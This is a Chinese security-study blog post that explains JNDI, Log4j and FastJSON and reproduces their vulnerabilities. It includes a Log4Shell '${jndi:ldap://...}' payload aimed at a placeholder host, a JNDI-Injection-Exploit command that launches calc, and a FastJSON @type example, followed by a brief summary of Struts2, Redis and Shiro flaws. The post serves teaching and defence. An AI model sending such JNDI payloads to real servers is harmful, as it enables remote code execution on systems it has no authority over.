安全学习_开发相关_Java第三方组件Log4j&FastJSON及相关安全问题简介


请添加图片描述

JNDI:(见图)

Java Naming and Directory Interface (Java 命名和目录接口 ),JNDI 提供统一的客户端 API,通过不同的服务供应接口(SPI)的实现,由管理者将 JNDI API 映射为特定的命名服务和目录服务,使得 JAVA 应用程可以通过 JNDI 实现和这些命名服务和目录服务之间的交互。

Java-三方组件-Log4J&JNDI

Log4J:

Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。

Log4j-组件安全复现

漏洞出现条件:

1、开发源码中引用漏洞组件入log4j

2、开发中使用组件的代码(触发漏洞代码)

3、可控变量去传递payload来实现攻击

4、利用jndi-ldap执行

jndi中的ldap和rmi是最常用的方法进行远程调用。

测试:

使用Log4j

// 创建logger对象,用于输出日志
public static final Logger logger = LogManager.getLogger(Log4jTest.class);
public static void main(String[] args) {
    logger.error("错误日志");
}

测试:

输入字符串${java:os},显示系统信息。

public static final Logger logger = LogManager.getLogger(Log4jTest.class);
public static void main(String[] args) {
    String code = "${java:vm}";
    logger.error("{}",code);
}

结果:

[main] ERROR com.log4jdemo.Log4jTest - Windows 11 10.0, architecture: amd64-64
String exp="${jndi:ldap://xx.xx.xx.xx:xx/xxx}";

服务器:

使用jndi注入工具生成地址。

java -jar JNDI-Injection-Exploit.jar -C "calc" -A xx.xx.xx.xx

Java-三方组件-FastJson

FastJson:

在前后端数据传输交互中,经常会遇到字符串(String)与json,XML等格式相互转换与解析,其中json以跨语言,跨前后端的优点在开发中被频繁使用,基本上是标准的数据交换格式。它的接口简单易用,已经被广泛使用在缓存序列化,协议交互,Web输出等各种应用场景中。FastJson是阿里巴巴的的开源库,用于对JSON格式的数据进行解析和打包。

底层通过反射原理实现。

Fastjson-组件安全复现

1、Maven引用Fastjson

2、创建需转换类对象User

3、使用Fastjson进行数据转换

4、数据转换(对象转Json,Json转对象)

对象转Json(带类型)

// user 对象
User user = new User("chuan","man",12);

// 把数据转换为Json格式数据,存储在String字符串中,选用第三方组件fastjson做这个功能。
String string = JSONObject.toJSONString(user);
// 打印查看
System.out.println("string = " + string);

// SerializerFeature.WriteClassName输出转换数据的类型(类),其实本身就带类型
String string2 = JSONObject.toJSONString(user, SerializerFeature.WriteClassName);
System.out.println("多输出转换数据的类型:string2 = " + string2);

Json转对象

// 其中\"为idea自动转义,避免和字符串引号冲突。
String test = "{\"@type\":\"com.fastjsondemo.User\",\"age\":12,\"gender\":\"man\",\"name\":\"chuan\"}";
// test字符串(JSON)转换为Java对象
JSONObject jsonObject = JSON.parseObject(test);
System.out.println(jsonObject);

漏洞成因:

转换数据时造成的。前端得到的JSON对象进行转换时,若JSON对象为用户发送的恶意注入,通过调用一些类方法实现攻击。

Fastjson漏洞复现(大佬文章

https://blog.csdn.net/guo15890025019/article/details/120532891

  • 25
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
好的,我会分别解释Struts2漏洞、Redis漏洞、Shiro漏洞、Fastjson漏洞和Log4j漏洞的原理。 1. Struts2漏洞:Struts2是一个广泛使用的Java Web框架,其漏洞主要是由于一些不安全的代码实现导致的。其中最著名的漏洞是Struts2远程代码执行漏洞,攻击者可以利用此漏洞在目标服务器上执行任意代码,进而控制服务器。该漏洞的原因是由于Struts2在处理客户端输入时没有正确过滤恶意代码,导致攻击者可以通过构造恶意请求来执行任意代码。 2. Redis漏洞:Redis是一个开源的内存数据库,其漏洞主要是由于Redis的默认配置不够安全导致的。其中最常见的漏洞是未授权访问漏洞和远程代码执行漏洞。未授权访问漏洞是由于Redis默认情况下没有开启认证,攻击者可以直接连接到Redis服务器并进行恶意操作。远程代码执行漏洞是由于Redis支持执行Lua脚本,攻击者可以通过构造恶意脚本来在Redis服务器上执行任意代码。 3. Shiro漏洞:Shiro是一个Java安全框架,用于处理身份验证、授权、加密等安全相关问题。其漏洞主要是由于Shiro的默认配置不够安全导致的。其中最常见的漏洞是未授权访问漏洞和身份伪造漏洞。未授权访问漏洞是由于Shiro默认情况下没有开启认证,攻击者可以直接访问受保护的资源。身份伪造漏洞是由于攻击者可以通过伪造身份信息来绕过身份验证机制。 4. Fastjson漏洞:Fastjson是一个Java的JSON解析库,其漏洞主要是由于Fastjson在处理JSON数据时没有正确过滤恶意代码导致的。其中最常见的漏洞是远程代码执行漏洞,攻击者可以通过构造恶意JSON数据来在目标服务器上执行任意代码。 5. Log4j漏洞:Log4j是一个Java日志框架,其漏洞主要是由于Log4j的默认配置不够安全导致的。其中最著名的漏洞是Log4Shell漏洞,攻击者可以通过构造恶意的日志信息来在目标服务器上执行任意代码。该漏洞的原因是由于Log4j在处理日志信息时会执行其中的代码,攻击者可以通过构造特定的日志信息来执行任意代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值